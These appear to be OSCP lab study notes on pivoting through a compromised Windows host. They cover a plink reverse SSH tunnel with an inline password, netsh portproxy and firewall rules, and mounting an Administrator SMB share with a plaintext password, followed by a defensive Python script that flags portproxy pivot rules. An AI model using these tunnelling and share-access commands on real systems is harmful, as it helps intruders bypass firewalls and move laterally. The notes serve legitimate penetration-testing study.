OSCP Notes

Port forwarding Windows

netstat -anpb TCP
and see that there is another service running, but a firewall is stopping us from connecting to it.
you can transfer plink.exe (the Windows command line SSH client) to the target and open a remote port forward back to Kali:
cmd.exe /c echo y | plink.exe -ssh -l kali -pw pass -R kali_IP:1234:127.0.0.1:3396 kali_IP
(3396 is the port of the service running on Windows; 1234 is the port that will be opened on Kali; `echo y` answers the host key prompt)
if it works, we can do a quick nmap scan from Kali against the forwarded port to confirm:
nmap -sS -sV 127.0.0.1 -p 1234
----

Using SYSTEM level shell to pivot through with NETSH

netsh is installed on most Windows versions
  • it has to have the IP Helper service running and IPv6 support enabled (can be confirmed in Windows Services and the network interface settings)
netsh interface portproxy add v4tov4 listenport=4455 listenaddress=current_IP connectport=445 connectaddress=other_network_IP
add a firewall rule so the new listening port is reachable:
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=current_IP localport=4455 action=allow
on Kali, we stop the SMB service
sudo /etc/init.d/smbd restart
smbclient -L target_IP --port=4455 --user=Administrator
(target_IP is the compromised Windows host that is listening on 4455)
then try to mount the file share:
sudo mkdir /mnt/win10_share
sudo mount -t cifs -o port=4455 //10.11.0.22/Data -o username=Administrator,password=Qwerty09! /mnt/win10_share
ls -l /mnt/win10_share/
cat /mnt/win10_share/data.txt
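From the defender's side, the portproxy rule above leaves a visible footprint: `netsh interface portproxy show all` lists every listener and where it connects. The script below is an added example (not from these notes) that parses that table, with a constructed sample modelled on the rule above, and flags entries that forward traffic to a different host, which is the pattern a pivot through netsh produces.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from ipaddress import ip_address

# Constructed sample of `netsh interface portproxy show all` output, modelled on the
# listen 4455 -> connect 445 rule in the notes. Addresses other than 10.11.0.22 are invented.
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.11.0.22      4455        192.168.1.110   445
127.0.0.1       8080        127.0.0.1       80
"""

@dataclass(frozen=True)
class PortProxyRule:
    listen_addr: str
    listen_port: int
    connect_addr: str
    connect_port: int

# One data row: listen address, listen port, connect address, connect port.
ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")

def parse_portproxy(text: str) -> list[PortProxyRule]:
    """Return the data rows of `netsh interface portproxy show all`, skipping headers."""
    rules = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue  # title line, column headers, dashed separator, blanks
        la, lp, ca, cp = m.groups()
        rules.append(PortProxyRule(la, int(lp), ca, int(cp)))
    return rules

def is_local_target(addr: str) -> bool:
    """True for loopback/unspecified addresses; hostnames are treated as remote."""
    try:
        ip = ip_address(addr)
    except ValueError:
        return False
    return ip.is_loopback or ip.is_unspecified

def suspicious_rules(rules: list[PortProxyRule]) -> list[PortProxyRule]:
    """Flag rules whose connect side is another host: the netsh pivot pattern."""
    return [r for r in rules
            if not is_local_target(r.connect_addr) and r.connect_addr != r.listen_addr]

if __name__ == "__main__":
    for r in suspicious_rules(parse_portproxy(SAMPLE_OUTPUT)):
        print(f"pivot candidate: {r.listen_addr}:{r.listen_port} -> {r.connect_addr}:{r.connect_port}")
```

On a live host, feed the script the real command output and pair any hit with the matching `netsh advfirewall firewall show rule` entry that opened the listening port.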